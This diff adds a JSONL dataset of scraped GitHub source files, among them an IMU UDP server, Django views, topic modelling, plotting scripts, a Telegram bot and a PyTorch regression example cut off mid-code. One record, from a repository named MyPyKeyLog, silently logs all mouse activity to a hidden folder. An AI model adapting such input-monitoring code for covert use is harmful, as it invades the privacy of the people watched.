diff --git "a/4259.jsonl" "b/4259.jsonl" new file mode 100644--- /dev/null +++ "b/4259.jsonl" @@ -0,0 +1,849 @@ +{"seq_id":"26589952813","text":"import subprocess\nimport time\nimport socket\nimport threading\nimport Config\nfrom ImuClient import ImuClient\n\nPORT_CLIENT = 6001\nPORT_SERVER = 6002\nimu_data = ''\n\ndef ProcessImu():\n imu_client = ImuClient()\n global imu_data\n\n while True:\n time.sleep(0.01)\n (ax, ay, az), (ox, oy, oz) = imu_client.data\n imu_data = ','.join(str(i) for i in [ax, ay, az, ox, oy, oz])\n\nif __name__ == '__main__':\n thread = threading.Thread(target=ProcessImu)\n thread.start()\n\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind((Config.IP_ADDRESS, PORT_SERVER))\n\n print('waiting...')\n\n while True:\n # クライアントから何かしら送られてくるまで待機\n s.recvfrom(Config.BUFFER_SIZE)\n\n # IMUのデータを送る\n s.sendto(\n imu_data.encode(),\n (Config.IP_ADDRESS, PORT_CLIENT)\n )\n print(imu_data)\n","repo_name":"TakutoJibiki/ninja-scan-light-imu","sub_path":"UnityServer.py","file_name":"UnityServer.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"70408212758","text":"from pynput import mouse\nimport logging\nimport time\nimport os\nfrom datetime import datetime\n\nDATE_FILE = datetime.now().strftime('%d%m%Y')\nDATE_LOG = datetime.now().strftime('%d/%m/%Y %H:%M')\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\nif os.path.exists(f'{BASE_DIR}/.logs/') == False:\n os.mkdir(f'{BASE_DIR}/.logs/')\n\nlogging.basicConfig(filename=f\"{BASE_DIR}/.logs/mouse_log_{DATE_FILE}.log\", level=logging.DEBUG, format=\"%(asctime)s: %(message)s\")\n\ndef on_move(x, y):\n logging.info(f\"Mouse moveu para {x, y}\")\n\ndef on_click(x, y, button, pressed):\n if pressed:\n logging.info(f\"Mouse clicou em {x, y, button}\")\n\ndef on_scroll(x, y, dx, dy):\n logging.info(f\"Mouse scrolled em {x, y, dx, dy}\")\n\na = mouse.Listener()\n\nwith mouse.Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as listener:\n listener.join()\n","repo_name":"dhanielsales/MyPyKeyLog","sub_path":"MouseOnlyLogger.py","file_name":"MouseOnlyLogger.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9466773877","text":"from django.template import RequestContext\nfrom django.views.generic import DeleteView\nfrom django.core.urlresolvers import reverse\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.shortcuts import redirect, render_to_response\nfrom django.contrib.auth.decorators import login_required\n\nfrom buddy.utils import datetime_string\n\nfrom image.models import ImageRequest\nfrom image.forms import ImageRequestForm, ImageOfferForm\n\nclass DeleteImageView(DeleteView):\n model = ImageRequest\n success_url = \"/\" \n\n@login_required\ndef request_image(request):\n form = ImageRequestForm(request.POST or None)\n\n if form.is_valid():\n instance = form.instance\n instance.user = request.user\n instance.save()\n \n return redirect(reverse('index'))\n\n return render_to_response('image/imagerequest_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n@login_required\ndef offer_image(request):\n if request.method == \"POST\":\n form = ImageOfferForm(request.POST, request.FILES)\n \n if form.is_valid():\n file = form.cleaned_data['image']\n\n instance = form.instance\n instance.request = ImageRequest.objects.get(pk=request.POST['request'])\n instance.user = request.user\n instance.image.save(\"%s-%s\" % (datetime_string(), file.name), ContentFile(file.read()))\n io = instance.save()\n\n return redirect(reverse('index'))\n else:\n return render_to_response('image/imageoffer_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n else:\n form = ImageOfferForm()\n return render_to_response('image/imageoffer_form.html',\n {'form':form},\n context_instance=RequestContext(request))\n\n","repo_name":"buddylindsey/photo-blogger","sub_path":"image/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"26462487262","text":"\r\nimport pandas as pd\r\nimport re\r\nimport nltk\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nfrom pyLDAvis import display\r\nimport pyLDAvis.gensim_models as gensimvis\r\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\r\nfrom gensim.utils import simple_preprocess\r\nfrom gensim.parsing.preprocessing import STOPWORDS\r\nfrom gensim import corpora, models\r\nfrom wordcloud import WordCloud\r\nfrom matplotlib import colors as mcolors\r\nfrom read_data import read_data\r\n\r\n\r\n# Preprocess text data\r\n# Define the regular expression patterns\r\npattern1 = r'^(c-\\d+-\\d+)\\s+X\\s+(.*)$'\r\npattern2 = r'^(readme-\\d+)\\s+X\\s+(.*)$'\r\ndf1, df2 = read_data(pattern1, pattern2)\r\n\r\n\r\ndef preprocess_text(text):\r\n result = []\r\n stemmer = SnowballStemmer(language='english')\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n for token in simple_preprocess(text):\r\n if token not in STOPWORDS and len(token) > 3:\r\n stemmed_token = stemmer.stem(lemmatizer.lemmatize(token, pos='v'))\r\n result.append(stemmed_token)\r\n\r\n return result\r\n\r\n# Read and preprocess data\r\n\r\n\r\ndef preprocess_data(df, text_column):\r\n documents = df[text_column].map(preprocess_text)\r\n return documents\r\n\r\n# Visualize topic modeling\r\n\r\n\r\ndef visualize_topics(lda_model, corpus, dictionary):\r\n lda_display = gensimvis.prepare(\r\n lda_model, corpus, dictionary, sort_topics=False)\r\n display(lda_display)\r\n\r\n# Build LDA model\r\n\r\n\r\ndef build_lda_model(documents, num_topics):\r\n dictionary = corpora.Dictionary(documents)\r\n corpus = [dictionary.doc2bow(doc) for doc in documents]\r\n lda_model = models.LdaModel(\r\n corpus, num_topics=num_topics, id2word=dictionary, passes=10, alpha='auto', eta='auto')\r\n return lda_model, corpus, dictionary\r\n\r\n\r\n# Output A) Parameters, B) Parameters, and N) Parameters\r\ndef output_model_parameters(lda_model):\r\n alpha = lda_model.alpha[0]\r\n beta = lda_model.eta[0]\r\n num_topics = lda_model.num_topics\r\n\r\n time.sleep(1)\r\n\r\n return alpha, beta, num_topics\r\n\r\n\r\n# Wordcloud of Top N words in each topic\r\n\r\n\r\ndef visualize_wordcloud(lda_model):\r\n cols = [color for name, color in mcolors.TABLEAU_COLORS.items()]\r\n stop_words = STOPWORDS\r\n\r\n cloud = WordCloud(stopwords=stop_words,\r\n background_color='white',\r\n width=2500,\r\n height=1800,\r\n max_words=10,\r\n colormap='tab10',\r\n color_func=lambda *args, **kwargs: cols[i],\r\n prefer_horizontal=1.0)\r\n\r\n topics = lda_model.show_topics(formatted=False)\r\n\r\n fig, axes = plt.subplots(2, 2, figsize=(10, 10), sharex=True, sharey=True)\r\n\r\n for i, ax in enumerate(axes.flatten()):\r\n fig.add_subplot(ax)\r\n topic_words = dict(topics[i][1])\r\n cloud.generate_from_frequencies(topic_words, max_font_size=300)\r\n plt.gca().imshow(cloud)\r\n plt.gca().set_title('Topic ' + str(i), fontdict=dict(size=16))\r\n plt.gca().axis('off')\r\n\r\n plt.ion()\r\n plt.subplots_adjust(wspace=0, hspace=0)\r\n plt.axis('off')\r\n plt.margins(x=0, y=0)\r\n plt.tight_layout()\r\n plt.savefig('plot.png')\r\n open_plot_image('plot.png')\r\n\r\n\r\ndef open_plot_image(filename):\r\n img = Image.open(filename)\r\n img.show()\r\n","repo_name":"Priyanka2345/HIS_Project","sub_path":"model_.py","file_name":"model_.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36334639137","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 17:08:35 2021\n\n@author: jakravit\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\nstrampath = '/Users/jakravit/git/EAP/data/final_ranges/stramski/'\nvcourtpath = '/Users/jakravit/git/EAP/data/final_ranges/vcourt/'\n\nstramlist = os.listdir(strampath)\nvcourtlist = os.listdir(vcourtpath)\n\ndef get_phytos(plist,ppath): \n phytos = {}\n for phy in plist:\n if phy.startswith('.'):\n continue\n fpath = ppath + phy\n with open(fpath, 'rb') as fp:\n data = pickle.load(fp)\n phytos[phy] = data\n return phytos\n\nstramphy = get_phytos(stramlist, strampath)\nvcourtphy = get_phytos(vcourtlist, vcourtpath)\n\n#%%\nl1 = np.arange(400,905,5)\nl2 = np.arange(400,901,1)\nl3 = np.array([440,470,510,620])\n# lac9 = np.array([412,440,488,510,532,555,620,650,676,715])\n# lhs6 = np.array([442,488,532,555,620,676])\n\nclasses = {'Bacillariophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Chlorophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Coscinodiscophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Cryptophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Cyanophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Dinophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Fragilariophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Pelagophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Prasinophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Prymnesiophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Raphidophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Rhodophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]},\n 'Haptophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]}, \n 'Eustigmatophyceae': {'wtruth':[],'struth':[],'vtruth':[],'data':[],'vg':[],'ci':[],'nshell':[],'deff':[],'sp':[]} \n }\n\ndef get_classes(classes,data,p):\n for phyto in data:\n c = data[phyto]['class']\n for sname in data[phyto][p].index:\n info = sname.split('_')\n classes[c]['vg'].append(float(info[0]))\n classes[c]['ci'].append(float(info[1]))\n classes[c]['nshell'].append(float(info[2]))\n classes[c]['sp'].append(phyto)\n if len(info) == 4:\n classes[c]['deff'].append(float(info[3]))\n else:\n classes[c]['deff'].append(float(info[4]))\n classes[c]['data'].append(data[phyto][p].loc[sname,:])\n return classes\n\np = 'a'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/astar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\np = 'b'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/bstar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\np = 'bb'\nclasses = get_classes(classes,stramphy,p)\nclasses = get_classes(classes,vcourtphy,p)\nwith open('/Users/jakravit/Desktop/bbstar_classes.p', 'wb') as fp:\n pickle.dump(classes,fp)\n \n#%%\n# stramski validation data\nwith open('/Users/jakravit/git/EAP/data/val/stram_optics.p', 'rb') as fp:\n stram_val = pickle.load(fp) \nfor code in stram_val:\n if code in ['hbac','viru']:\n continue\n info = stram_val[code]\n cl = info['Class']\n classes[cl]['struth'].append(info[p])\n\n# vcourt validation data\npath = '/Users/jakravit/git/EAP/data/val/'\ncourt_val = {'a': pd.read_csv(path + 'vcourt_a.csv'),\n 'b': pd.read_csv(path + 'vcourt_b.csv'),\n 'bb':pd.read_csv(path + 'vcourt_bb.csv'),\n }\nvdata = court_val[p]\ngroups = vdata.groupby('Class')\nfor gi,gd in groups:\n # if gi in ['Eustigmatophyceae']:\n # continue\n classes[gi]['vtruth'].append(gd.iloc[:,2:].values)\n\n# whitmire validation data\n# path = '/Users/jakravit/git/EAP/data/val/'\n# whit_val = {'a': pd.read_csv(path + 'whit_a_subset.csv'),\n# 'b': pd.read_csv(path + 'whit_b_subset.csv'),\n# 'bb':pd.read_csv(path + 'whit_bb_subset.csv'),\n# }\n# wdata = whit_val[p]\n# groups = wdata.groupby('Class')\n# for gi,gd in groups:\n# classes[gi]['wtruth'] = gd.iloc[:,4:].div(gd.Chl,axis=0)\n\n# concat data groups\nfor c in classes:\n classes[c]['data'] = pd.concat(classes[c]['data'],axis=1).T\n \n# concat truth groups\nfor c in classes:\n if len(classes[c]['vtruth']): \n if p == 'bb':\n col = l3\n else:\n col = l2\n classes[c]['vtruth'] = pd.DataFrame(np.vstack((classes[c]['vtruth'])),columns=col)\n\nfor c in classes:\n if len(classes[c]['struth']):\n classes[c]['struth'] = pd.DataFrame(np.vstack((classes[c]['struth'])),columns=l2)\n\n# for c in classes:\n# if len(classes[c]['wtruth']): \n# if p == 'bb':\n# col = lhs6\n# else:\n# col = lac9\n# classes[c]['wtruth'].columns = col\n \n#%%\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize': 'small',\n 'axes.labelsize': 18,\n 'axes.titlesize': 24,\n 'xtick.labelsize': 13,\n 'ytick.labelsize': 13\n }\npylab.rcParams.update(params)\n\nfig, axs = plt.subplots(4,4,figsize=(20,20), sharex=True, sharey=True)\naxs = axs.ravel()\ncount = 0\n\nif p in ['a','b']:\n for c in classes:\n print (c)\n res = sm.graphics.fboxplot(classes[c]['data'].values, l1, wfactor=1000, ax=axs[count])\n if not isinstance(classes[c]['vtruth'], list): \n classes[c]['vtruth'].T.plot(ax=axs[count],color='b',legend=False)\n if not isinstance(classes[c]['struth'], list):\n classes[c]['struth'].T.plot(ax=axs[count],color='r',legend=False)\n # if not isinstance(classes[c]['wtruth'], list):\n # classes[c]['wtruth'].T.plot(ax=axs[count],color='g',ls='--',marker='o',legend=False)\n axs[count].set_title(c)\n if p == 'b':\n axs[count].set_ylim(0,.7)\n else:\n axs[count].set_ylim(0,.1)\n axs[count].set_xlim(400,800)\n count = count+1\n \nelse:\n for c in classes:\n print (c)\n res = sm.graphics.fboxplot(classes[c]['data'].values, l1, wfactor=1000, ax=axs[count])\n if not isinstance(classes[c]['vtruth'], list): \n classes[c]['vtruth'].T.plot(ax=axs[count],color='b',ls='--',marker='o', legend=False)\n if not isinstance(classes[c]['struth'], list):\n classes[c]['struth'].T.plot(ax=axs[count],color='r',legend=False)\n # if not isinstance(classes[c]['wtruth'], list):\n # classes[c]['wtruth'].T.plot(ax=axs[count],color='g',ls='--',marker='o',legend=False)\n axs[count].set_title(c)\n axs[count].set_ylim(0,.01)\n axs[count].set_xlim(400,800)\n count = count+1 \n \nplt.subplots_adjust(hspace=.2,wspace=.1)\nfig.savefig('/Users/jakravit/Desktop/{}.png'.format(p),bbox_inches='tight',dpi=300)\n\n\n#%%\nfig, axs = plt.subplots(1,4, figsize=(15,7),sharey=True)\naxs = axs.ravel()\nfor i,v in enumerate(['deff','ci','vg','nshell']):\n df = {}\n for c in classes:\n df[c] = classes[c][v] \n axs[i].boxplot(df.values(),vert=False,whis=1.5)\naxs[0].set_yticks(range(1,len(df.keys())+1))\naxs[0].set_yticklabels(df.keys())\naxs[0].set_xlabel(u'Deff (\\u03bcm)')\naxs[1].set_xlabel('Ci (kgm$^{-3}$)')\naxs[2].set_xlabel('Vg (%)')\naxs[3].set_xlabel('n_shell')\nplt.subplots_adjust(wspace=.1)\nfig.savefig('/Users/jakravit/Desktop/2layer_params.png',bbox_inches='tight',dpi=300)\n\n\n","repo_name":"JAKravitz/EAPtesting","sub_path":"scripts/class_plot.py","file_name":"class_plot.py","file_ext":"py","file_size_in_byte":8368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5257679846","text":"import asyncio\nimport logging\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.filters import Command\nimport config\nimport sqlite3\n\n\nconnect = sqlite3.connect('data.db')\ncursor = connect.cursor()\n\ncursor.execute('''SELECT * FROM parsing_data''')\ndata = cursor.fetchall()\n\nartist_dict = {}\ndata_dict = {}\n\nfor i in data:\n if i[0] not in artist_dict:\n artist_dict[i[0]] = i[1]\n\n data_dict[i[2]] = [i[0], i[3], i[5], i[6], i[7], i[8], i[9], i[10], i[4]]\n\n\n# Включаем логирование, чтобы не пропустить важные сообщения\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=config.TOKEN)\ndp = Dispatcher()\n\n\n@dp.message(Command(\"start\"))\nasync def cmd_start(message: types.Message):\n kb = []\n for artist in artist_dict:\n kb.append([types.KeyboardButton(text=artist)])\n keyboard = types.ReplyKeyboardMarkup(keyboard=kb, resize_keyboard=True)\n await message.answer(\"Выбирите артиста\", reply_markup=keyboard)\n\n\n@dp.message()\nasync def button(message: types.Message):\n kb = []\n if message.text in artist_dict: # проверяем есть ли введёный артист в словаре\n for position in data_dict: # перебираем все товары\n print(position)\n if position != None and data_dict[position][0] == message.text:\n # создаём кнопку с именем товара\n kb.append([types.KeyboardButton(text=position)])\n kb.append([types.KeyboardButton(text='Домой')])\n keyboard = types.ReplyKeyboardMarkup(keyboard=kb, resize_keyboard=True)\n await message.answer(f'Выбери шмот', reply_markup=keyboard)\n\n elif message.text == 'Домой':\n await cmd_start(message)\n\n elif message.text in data_dict:\n for product in data_dict:\n if product == message.text:\n price = data_dict[message.text][2]\n type_product = data_dict[message.text][3]\n color = data_dict[message.text][4]\n structur = data_dict[message.text][5]\n application_chest = data_dict[message.text][6]\n application_back = data_dict[message.text][7]\n img = data_dict[message.text][8]\n\n mes = f'Товар: {product}\\nЦена: {price}руб.\\n{type_product}\\n{color}\\n{structur}\\n{application_chest}\\n{application_back}'\n while 'None' in mes:\n mes = mes.replace('None', '')\n await message.answer(mes, parse_mode='HTML')\n else:\n await message.answer('Ты говоришь на непонятном мне языке')\n\n\nasync def main():\n await dp.start_polling(bot)\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"KASSAS20/GLAM_GO_SHMOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"43045532779","text":"import os\n\n# os.mkdir('11') # 创建文件\n# os.removedirs('11') # 删除文件\n# print(os.listdir('./')) # 以列表形式列出当前路径中的文件,目录\n# print(os.getcwd()) # 列出当前路径\n\nprint(os.path.exists('b')) # 判断b文件是否存在,False表示不存在\n# 判断是否存在b文件,如果文件不存在,则创建文件夹\nif not os.path.exists('b'):\n os.mkdir('b')\n# 判断b下面有没有test.txt文件,如果没有,则打开文件,写入\n# if 后面为True时,才会执行下面的语句块\nif not os.path.exists('b/test.txt'):\n f = open('b/test.txt', 'w')\n f.write('hello,python')\n f.close()\n","repo_name":"Chan0619/FIS03","sub_path":"python/python标准库os.py","file_name":"python标准库os.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4568170975","text":"\"\"\"\r\nCopyright (c) 2016 S-BEAT GbR and others\r\n\r\nThis file is part of S-BEAT.\r\n\r\nS-BEAT is free software: you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nS-BEAT is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with S-BEAT. If not, see .\r\n\"\"\"\r\n\r\nfrom Db import DBDocument\r\nimport hashlib\r\nimport struct\r\n\r\n\r\nclass Query(DBDocument):\r\n \"\"\"\r\n The Query tells where to find a value.\r\n \"\"\"\r\n\r\n collection_name = 'queries'\r\n cached_items = {}\r\n\r\n def __init__(self, q=None, name=None, category=None, formatting='auto', query_type='dict', success=False,\r\n depends=None, ignore=False):\r\n self.name = name # the query description\r\n self.category = category # category of the query\r\n self.formatting = formatting # formatting: int, float:2, date, grade, semester, yesno\r\n self.query_type = query_type # Type of query: dict,call\r\n self.q = q # Query value could be a path to the needed resource\r\n self.success = success # Is this query relevant for success\r\n self.depends = depends # list of PathElements which are required before this can be used\r\n self.ignore = ignore # Ignore this query for path generation\r\n self._id = None # Databse ID if available, is calculated automatically on save with md5_id()\r\n self.auto_generate = False # should the conditions be generated automatically\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, type(self)) and \\\r\n (self.query_type, self.q) == \\\r\n (other.query_type, other.q)\r\n\r\n def md5(self):\r\n m = hashlib.md5()\r\n m.update(self.query_type)\r\n m.update(self.q)\r\n return m.digest()\r\n\r\n def md5_id(self):\r\n return struct.unpack('>q', '\\0\\0' + self.md5()[10:16])[0]\r\n\r\n def __hash__(self):\r\n return hash(self.md5())\r\n\r\n def run(self, data):\r\n if self.q in data:\r\n return data[self.q]\r\n else:\r\n return select_by_path(self.q.split('.'), data)\r\n\r\n def get_dict(self, str_ids=False, replace_vars=None):\r\n data = self.__dict__.copy()\r\n if str_ids:\r\n if isinstance(self.depends, set):\r\n data['depends'] = list()\r\n for pe_id in self.depends:\r\n data['depends'].append(str(pe_id))\r\n\r\n if replace_vars is not None:\r\n for key, val in replace_vars.iteritems():\r\n data['name'] = data['name'].replace(key, val)\r\n data['category'] = data['category'].replace(key, val)\r\n\r\n return data\r\n\r\n def get_str(self):\r\n return self.q\r\n\r\n def get_depends_elements(self):\r\n import DataDefinitions\r\n\r\n result = set()\r\n if self.depends is None:\r\n return result\r\n for el_id in self.depends:\r\n el = DataDefinitions.get_element_by_hash(el_id)\r\n if el is not None:\r\n result.add(el)\r\n return result\r\n\r\n @staticmethod\r\n def from_dict(data):\r\n q = Query()\r\n q.name = data['name']\r\n q.category = data['category']\r\n q.formatting = data['formatting']\r\n q.query_type = data['query_type']\r\n q.q = data['q']\r\n q.success = data['success']\r\n q.depends = data['depends']\r\n if isinstance(q.depends, list):\r\n q.depends = set(q.depends)\r\n q.ignore = data['ignore']\r\n if '_id' in data:\r\n q._id = data['_id']\r\n if 'auto_generate' in data:\r\n q.auto_generate = data['auto_generate']\r\n return q\r\n\r\n def __repr__(self):\r\n return 'Query(' + repr(self.q) + ')'\r\n\r\n def db_transform(self):\r\n \"\"\"\r\n Transforms self to a database dictionary object.\r\n Gets called by transform_incoming of SONManipulator\r\n \"\"\"\r\n\r\n data = self.get_dict().copy()\r\n if isinstance(data['depends'], set):\r\n data['depends'] = list(data['depends'])\r\n data['_id'] = self.md5_id()\r\n return data\r\n\r\n @staticmethod\r\n def db_create(son):\r\n \"\"\"\r\n Creates a new Instance based of database SON data.\r\n Gets called by transform_outgoing of SONManipulator\r\n \"\"\"\r\n return Query.from_dict(son)\r\n\r\n @classmethod\r\n def find_by_id(cls, query_id):\r\n return cls.find_one({'_id': query_id})\r\n\r\n # if query_id in cls.cached_items:\r\n # return cls.cached_items[query_id]\r\n # else:\r\n # cls.cached_items[query_id] = cls.find_one({'_id': query_id})\r\n # return cls.cached_items[query_id]\r\n\r\n\r\ndef select_by_path(path, data):\r\n d = data\r\n for attr in path:\r\n if d is not None and attr in d:\r\n d = d[attr]\r\n else:\r\n return None\r\n return d\r\n","repo_name":"sbeat/s-beat","sub_path":"lib/DB/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"17837983945","text":"import argparse\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', default='greg_search.log')\nparser.add_argument('-o', default='greg_search.json')\nargs = parser.parse_args()\n\nf = open(args.i).readlines()\nperf_tup = [(l.split(': ')[0].strip(), [float(m) for m in eval(l.split(': ')[1])]) for l in f]\nperf_tup = sorted(perf_tup, key=lambda x: x[1][1], reverse=True)\n\njson.dump(dict(perf_tup), open(args.o, 'w+'), sort_keys=False, indent=2, ensure_ascii=True)","repo_name":"UAlberta-NLP/v-wsd","sub_path":"greg_sort.py","file_name":"greg_sort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"18116380281","text":"\"\"\" \n可视化操作界面\n\"\"\"\n\nimport tkinter\nfrom Utils import Utils\nfrom os import path\nfrom excel2json import Excel2Json\nfrom Utils import XLSX_ROOT, OUTPUT_ROOT\n\n# 创建主窗口\nwin = tkinter.Tk()\n\nwin.title('导表工具')\nwin.geometry('800x500+200+200')\nwin.minsize(800, 500)\nwin.maxsize(1100, 600)\n\n# 所有的xlsx文件\nxlsxRoot = XLSX_ROOT\nfiles = Utils.readFileList(xlsxRoot)\n# 导出路径\noutputRoot = OUTPUT_ROOT\n\n# 创建列表\nlistbox = tkinter.Listbox(win, font=(\"微软雅黑\", 12), height=20)\nlistbox.pack(fill='both', padx=20)\nfor i,file in enumerate(files):\n listbox.insert(i, file)\n\n\n# 导出所有\ndef exportAllFunc():\n print('print all')\n for file in files:\n filePath = path.normpath(path.join(xlsxRoot, file))\n excel2Json = Excel2Json(filePath, outputRoot)\n excel2Json.readFile()\n\nonekeyBtn = tkinter.Button(win, text='导出所有', width=20, font=(None,15), command=exportAllFunc)\nonekeyBtn.pack(side='right')\n\n# 选中导出\ndef exportSelectFunc():\n selectItem = listbox.curselection()\n if not selectItem:\n print('select error, please select one item!!!')\n return\n txt = listbox.get(selectItem) #选中的内容\n selectItemPath = path.normpath(path.join(xlsxRoot, txt))\n print('print selected: ', selectItemPath)\n excel2Json = Excel2Json(selectItemPath, outputRoot)\n excel2Json.readFile()\n\nsingleBtn = tkinter.Button(win, text='导出选中', width=20, font=(None,15), command=exportSelectFunc)\nsingleBtn.pack(side='left')\n\n# 显示窗口\nwin.mainloop()\n","repo_name":"zhengpj95/excel2json","sub_path":"src/maingui.py","file_name":"maingui.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21828504867","text":"from __future__ import annotations\n\nfrom dxtbx.model import ExperimentList\n\nfrom xia2.Schema import compare_geometries, load_reference_geometries\n\n\ndef test_load_reference_geometries(dials_data):\n \"\"\"\n Test `xia2.Schema.load_reference_geometries`.\n\n Test the function that finds the set of unique instrument models from a list\n of experiment list files.\n\n There are eight input instrument models, of which only two are unique.\n \"\"\"\n files = [\"scaled_20_25.expt\", \"scaled_30.expt\", \"scaled_35.expt\"]\n files = [dials_data(\"l_cysteine_4_sweeps_scaled\", pathlib=True) / f for f in files]\n files.append(dials_data(\"l_cysteine_dials_output\", pathlib=True) / \"indexed.expt\")\n\n num_input = sum(len(ExperimentList.from_file(f, check_format=False)) for f in files)\n assert num_input == 8, \"Expected to find eight experiments, one for each sweep.\"\n\n unique_geometries = load_reference_geometries(files)\n assert len(unique_geometries) == 2, \"Expected to find two unique instrument models.\"\n\n detectors = (geom[\"detector\"] for geom in unique_geometries)\n assert not compare_geometries(*detectors), \"Unique detectors cannot be equivalent.\"\n","repo_name":"xia2/xia2","sub_path":"tests/Schema/test_Schema.py","file_name":"test_Schema.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"85"} +{"seq_id":"16012348261","text":"import torch \nimport torchvision\n\n# srt = torchvision.datasets.MNIST()\n\n# pytorch构建线性回归\n# x_data = np.array([[1.0],[2.0],[3.0]])\n# y_data = np.array([[2.0],[4.0],[6.0]])\n\nx_data = torch.tensor([[1.0],[2.0],[3.0]]) # 构建张量\ny_data = torch.tensor([[2.0],[4.0],[6.0]])\n\nclass LinearModel(torch.nn.Module): # module会自动帮你实现反向过程 所以不需要自己实现bp\n def __init__(self):\n super().__init__()\n self.linear = torch.nn.Linear(1,1) # Linear是一个类 里面包含了 权重和偏置 linear是一个对象\n\n \n def forward(self, x):\n y_pred = self.linear(x)\n return y_pred\n\n\nmodel = LinearModel()\ncriterion = torch.nn.MSELoss(size_average=False) # 参数是否求均值 reduce看是否降维\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01) # parameters 会将所有需要优化的都放进去 lr学习率\n\n\n# 相当于训练过程\nfor epoch in range(200):\n y_pred = model(x_data) # 1. 算出y的预测值\n loss = criterion(y_pred, y_data) # 2. y_pred - y 算出loss\n # print('y_pred : ', y_pred)\n # print('loss : ', loss)\n \n\n optimizer.zero_grad() # 3. 梯度清零\n loss.backward() # 4. 反向传播\n optimizer.step() # 5. 更新梯度\n\n\n# 测试过程\n\nprint('w = ',model.linear.weight.item())\nprint('b = ',model.linear.bias.item())\n\n\nx_test = torch.tensor([[6.0],[4.0]])\ny_test = 